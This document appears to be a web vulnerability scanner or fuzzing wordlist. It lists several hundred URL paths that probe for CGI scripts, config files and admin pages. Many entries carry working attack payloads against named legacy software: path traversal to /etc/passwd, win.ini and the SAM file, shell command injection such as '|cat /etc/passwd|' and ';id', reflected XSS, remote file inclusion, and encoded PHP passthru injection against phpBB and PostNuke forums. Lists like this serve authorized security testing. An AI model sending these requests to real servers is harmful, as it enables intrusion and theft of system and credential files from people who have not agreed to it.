/cgi.cgi/
/webcgi/
/cgi-914/
/cgi-915/
/bin/
/cgi/
/mpcgi/
/cgi-bin/
/ows-bin/
/cgi-sys/
/cgi-local/
/htbin/
/cgibin/
/cgis/
/scripts/
/cgi-win/
/fcgi-bin/
/cgi-exe/
/cgi-home/
/cgi-perl/
/index.php
/junk999.php
/index.php3
/images
/robots.txt
/robots.txt
/~root
/webtop/wdk/
/cgi-bin/.htaccess
/cgi-bin/test-cgi.bat
/?D=A
/?M=A
/?N=D
/?S=A
/.DS_Store
/.DS_Store
/.FBCIndex
/.FBCIndex
/~nobody/etc/passwd
/666%0a%0a666.jsp
/admin.cgi
/blah-whatever.jsp
/cgi-bin/main_menu.pl
/cgi-bin/printenv
/cgi-bin/printenv
/cgi-bin/search
/cgi-bin/test-cgi
/cgi-bin/test-cgi
/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
/content/base/build/explorer/none.php?/etc/passwd
/doc/rt/overview-summary.html
/doc/webmin.config.notes
/docs/
/docs/sdb/en/html/index.html
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/error/HTTP_NOT_FOUND.html.var
/examples/
/examples/jsp/index.html
/examples/jsp/snp/snoop.jsp
/examples/jsp/source.jsp??
/examples/servlet/AUX
/examples/servlet/TroubleShooter
/examples/servlets/index.html
/icons/
/index.html.ca
/index.html.cz.iso8859-2
/index.html.de
/index.html.dk
/index.html.ee
/index.html.el
/index.html.en
/index.html.es
/index.html.et
/index.html.fr
/index.html.he.iso8859-8
/index.html.hr.iso8859-2
/index.html.it
/index.html.ja.iso2022-jp
/index.html.kr.iso2022-kr
/index.html.ltz.utf8
/index.html.lu.utf8
/index.html.nl
/index.html.nn
/index.html.no
/index.html.po.iso8859-2
/index.html.pt-br
/index.html.pt
/index.html.ru.cp-1251
/index.html.ru.cp866
/index.html.ru.iso-ru
/index.html.ru.koi8-r
/index.html.ru.utf8
/index.html.se
/index.html.tw.Big5
/index.html.tw
/index.html.var
/interscan/
/jservdocs/
/lpt9
/main_page.php
/manual/images/
/NetDetector/middle_help_intro.htm
/oem_webstage/cgi-bin/oemapp_cgi
/oem_webstage/oem.conf
/php/php.exe?c:\\boot.ini
/pls/admin
/server-info
/server-status
/servlet/MsgPage?action=test&msg=
/servlet/org.apache.catalina.ContainerServlet/
/servlet/org.apache.catalina.Context/
/servlet/org.apache.catalina.Globals/
/servlet/org.apache.catalina.servlets.WebdavStatus/
/servlets/MsgPage?action=badlogin&msg=
/site/eg/source.asp
/soap/servlet/soaprouter
/soapConfig.xml
/stronghold-info
/stronghold-status
/test
/test/jsp/buffer1.jsp
/test/jsp/buffer2.jsp
/test/jsp/buffer3.jsp
/test/jsp/buffer4.jsp
/test/jsp/declaration/IntegerOverflow.jsp
/test/jsp/extends1.jsp
/test/jsp/extends2.jsp
/test/jsp/Language.jsp
/test/jsp/pageAutoFlush.jsp
/test/jsp/pageDouble.jsp
/test/jsp/pageExtends.jsp
/test/jsp/pageImport2.jsp
/test/jsp/pageInfo.jsp
/test/jsp/pageInvalid.jsp
/test/jsp/pageIsErrorPage.jsp
/test/jsp/pageIsThreadSafe.jsp
/test/jsp/pageSession.jsp
/test/realPath.jsp
/tomcat-docs/index.html
/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
/webtop/wdk/samples/index.jsp
/XSQLConfig.xml
../../../../../../../../../../etc/*
../../../../../../../../../../etc/passw*
/admin/config.php
/adm/config.php
/cgi-bin/.access
/cgi-bin/.cobalt
/cgi-bin/.cobalt/alert/service.cgi?service=
/cgi-bin/.cobalt/alert/service.cgi?service=
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess.save
/cgi-bin/.htaccess
/cgi-bin/.htaccess~
/cgi-bin/.htpasswd
/cgi-bin/.namazu.cgi
/cgi-bin/.passwd
/cgi-bin/
/cgi-bin//htsearch?exclude=%60/etc/passwd%60
/cgi-bin/%2e%2e/abyss.conf
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/cgi-bin/addbanner.cgi
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/aglimpse.cgi
/cgi-bin/aglimpse
/cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/astrocam.cgi
/cgi-bin/AT-admin.cgi
/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=&Where=&Sort=Photo&Dir=
/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-bin/auth_data/auth_user_file.txt
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
/cgi-bin/badmin.cgi
/cgi-bin/banner.cgi
/cgi-bin/bannereditor.cgi
/cgi-bin/bash
/cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-bin/betsie/parserl.pl/;
/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
/cgi-bin/bizdb1-search.cgi
/cgi-bin/blog/
/cgi-bin/blog/mt-check.cgi
/cgi-bin/blog/mt-load.cgi
/cgi-bin/blog/mt.cfg
/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/boozt/admin/index.cgi?section=5&input=1
/cgi-bin/c32web.exe/ChangeAdminPassword
/cgi-bin/cachemgr.cgi
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calendar/index.cgi
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/cart32.exe
/cgi-bin/ccvsblame.cgi?file=/index.html&root=
/cgi-bin/cgi-lib.pl
/cgi-bin/cgicso?query=
/cgi-bin/cgicso?query=AAA
/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap/%3Cfont%20color=red%3E
/cgi-bin/cgiwrap/~adm
/cgi-bin/cgiwrap/~bin
/cgi-bin/cgiwrap/~daemon
/cgi-bin/cgiwrap/~ftp
/cgi-bin/cgiwrap/~guest
/cgi-bin/cgiwrap/~listen
/cgi-bin/cgiwrap/~lp
/cgi-bin/cgiwrap/~mysql
/cgi-bin/cgiwrap/~noaccess
/cgi-bin/cgiwrap/~nobody
/cgi-bin/cgiwrap/~nobody4
/cgi-bin/cgiwrap/~nuucp
/cgi-bin/cgiwrap/~operator
/cgi-bin/cgiwrap/~root
/cgi-bin/cgiwrap/~smmsp
/cgi-bin/cgiwrap/~smtp
/cgi-bin/cgiwrap/~sshd
/cgi-bin/cgiwrap/~sys
/cgi-bin/cgiwrap/~test
/cgi-bin/cgiwrap/~unknown
/cgi-bin/cgiwrap/~uucp
/cgi-bin/cgiwrap/~web
/cgi-bin/cgiwrap/~www
/cgi-bin/cgiwrap/~xxxxx
/cgi-bin/cgiwrap/~root
/cgi-bin/class/mysql.class
/cgi-bin/classified.cgi
/cgi-bin/classifieds/classifieds.cgi
/cgi-bin/classifieds/index.cgi
/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/compatible.cgi
/cgi-bin/Count.cgi
/cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csh
/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
/cgi-bin/cvsblame.cgi?file=
/cgi-bin/cvslog.cgi?file=*&rev=&root=
/cgi-bin/cvslog.cgi?file=
/cgi-bin/cvsquery.cgi?branch=&file=&date=
/cgi-bin/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
/cgi-bin/dansguardian.pl?DENIEDURL=
/cgi-bin/data/fetch.php?page=
/cgi-bin/db4web_c/dbdirname//etc/passwd
/cgi-bin/dbman/db.cgi?db=no-db
/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/cgi-bin/dcshop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/dcshop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-bin/diagnose.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
/cgi-bin/dose.pl
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat?&dir+c:\\\",
/cgi-bin/echo.bat
/cgi-bin/empower?DB=whateverwhatever
/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/environ.pl?param1=
/cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
/cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
/cgi-bin/excite;IFS=\\\"$\\\";/bin/cat/etc/passwd|mailtest@test.com
/cgi-bin/ezadmin.cgi
/cgi-bin/ezboard.cgi
/cgi-bin/ezman.cgi
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
/cgi-bin/faxsurvey?cat%20/etc/passwd
/cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
/cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
/cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/finger
/cgi-bin/flexform.cgi
/cgi-bin/flexform
/cgi-bin/fom.cgi?file=
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=vulnerable
/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
/cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/FormMail.cgi?
/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.cgi
/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.pl
/cgi-bin/formmail.pl
/cgi-bin/formmail
/cgi-bin/foxweb.dll
/cgi-bin/foxweb.exe
/cgi-bin/gbadmin.cgi?action=change_adminpass
/cgi-bin/gbpass.pl
/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
/cgi-bin/get32.exe
/cgi-bin/gettransbitmap
/cgi-bin/gH.cgi
/cgi-bin/gm-authors.cgi
/cgi-bin/gm-cplog.cgi
/cgi-bin/gm.cgi
/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/guestbook/passwd
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GWWEB.EXE?HELP=bad-request
/cgi-bin/handler.cgi
/cgi-bin/horde/test.php?mode=phpinfo
/cgi-bin/horde/test.php
/cgi-bin/horde/test.php
/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
/cgi-bin/htimage.exe?0,0
/cgi-bin/htimage.exe/path/filename?0,0
/cgi-bin/html2chtml.cgi
/cgi-bin/html2wml.cgi
/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
/cgi-bin/htsearch?-c/nonexistant
/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
/cgi-bin/htsearch?exclude=%60/etc/passwd%60
/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
/cgi-bin/ibill.pm
/cgi-bin/icat
/cgi-bin/ImageFolio/admin/admin.cgi
/cgi-bin/imagemap.exe
/cgi-bin/imagemap
/cgi-bin/inc/sendmail.inc
/cgi-bin/include/new-visitor.inc.php
/cgi-bin/index.pl
/cgi-bin/index.pl
/cgi-bin/index.pl
/cgi-bin/info2www'(../../../../../../../bin/mailroot
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/ion-p?page=../../../../../etc/passwd
/cgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam
/cgi-bin/ksh
/cgi-bin/ksh
/cgi-bin/ksh
/cgi-bin/listrec.pl
/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini
/cgi-bin/log/nether-log.pl?checkit
/cgi-bin/login.pl?course_id=\\\"><SCRIPT>alert('Vulnerable')</SCRIPT>
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate.cgi
/cgi-bin/lwgate
/cgi-bin/LWGate
/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
/cgi-bin/mailnews.cgi
/cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
/cgi-bin/mgrqcgi
/cgi-bin/mini_logger.cgi
/cgi-bin/mkilog.exe
/cgi-bin/mkplog.exe
/cgi-bin/mmstdod.cgi
/cgi-bin/moin.cgi?test
/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=blah
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/MsmMask.exe?mask=/junk334
/cgi-bin/mt-static/
/cgi-bin/mt-static/mt-check.cgi
/cgi-bin/mt-static/mt-load.cgi
/cgi-bin/mt-static/mt.cfg
/cgi-bin/mt/
/cgi-bin/mt/mt-check.cgi
/cgi-bin/mt/mt-load.cgi
/cgi-bin/mt/mt.cfg
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/cgi-bin/musicqueue.cgi
/cgi-bin/myguestbook.cgi?action=view
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
/cgi-bin/netpad.cgi
/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
/cgi-bin/nimages.php
/cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/nph-publish.cgi
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
/cgi-bin/nph-test-cgi
/cgi-bin/opendir.php?/etc/passwd
/cgi-bin/orders/orders.txt
/cgi-bin/pagelog.cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
/cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
/cgi-bin/perl?-v
/cgi-bin/perl.exe?-v
/cgi-bin/perl.exe
/cgi-bin/perl
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
/cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf
/cgi-bin/photo/
/cgi-bin/photo/manage.cgi
/cgi-bin/photo/protected/manage.cgi
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/plusmail
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00
/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ppdscgi.exe
/cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
/cgi-bin/processit.pl
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
/cgi-bin/query?mss=%2e%2e/config
/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
/cgi-bin/quizme.cgi
/cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/retrieve_password.pl
/cgi-bin/rksh
/cgi-bin/robadmin.cgi
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rtm.log
/cgi-bin/rwcgi60
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwwwshell.pl
/cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/scoadminreg.cgi
/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini
/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini
/cgi-bin/search.php?searchstring=
/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/cgi-bin/sendform.cgi
/cgi-bin/sendpage.pl
/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
/cgi-bin/SGB_DIR/superguestconfig
/cgi-bin/sh
/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
/cgi-bin/shop.pl/page=;cat%20shop.pl|
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/orders/orders.txt
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
/cgi-bin/showcheckins.cgi?person=
/cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
/cgi-bin/slxweb.dll
/cgi-bin/smartsearch.cgi
/cgi-bin/smartsearch/smartsearch.cgi
/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
/cgi-bin/spin_client.cgi?aaaaaaaa
/cgi-bin/ss
/cgi-bin/sscd_suncourier.pl
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
/cgi-bin/stat.pl
/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/store/agora.cgi?cart_id=
/cgi-bin/store/agora.cgi?page=whatever33.html
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/sws/admin.html
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/tcsh
/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi.exe?
/cgi-bin/testcgi.exe?
/cgi-bin/texis.exe/junk
/cgi-bin/texis/junk
/cgi-bin/title.cgi
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/troops.cgi
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/update.dpgs
/cgi-bin/upload.cgi
/cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-bin/view-source?view-source
/cgi-bin/view-source
/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=
/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\">;
/cgi-bin/viewsource?/etc/passwd
/cgi-bin/viralator.cgi
/cgi-bin/virgil.cgi
/cgi-bin/visadmin.exe
/cgi-bin/vote.cgi
/cgi-bin/vpasswd.cgi
/cgi-bin/vq/demos/respond.pl?
/cgi-bin/VsSetCookie.exe?
/cgi-bin/way-board.cgi?db=/etc/passwd%00
/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
/cgi-bin/wconsole.dll
/cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdriver
/cgi-bin/webgais
/cgi-bin/webif.cgi
/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webmap.cgi
/cgi-bin/Webnews.exe
/cgi-bin/webnews.pl
/cgi-bin/webplus?about
/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
/cgi-bin/webplus.exe?about
/cgi-bin/websendmail
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-bin/whois.cgi?action=load&whois=%3Bid
/cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\\boot.ini%
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\\",
/cgi-bin/windmail.exe
/cgi-bin/windmail
/cgi-bin/wrap.cgi
/cgi-bin/wrap
/cgi-bin/ws_ftp.ini
/cgi-bin/WS_FTP.ini
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwwais
/cgi-bin/wwwwais
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=
/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
/cgi-bin/zsh
/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
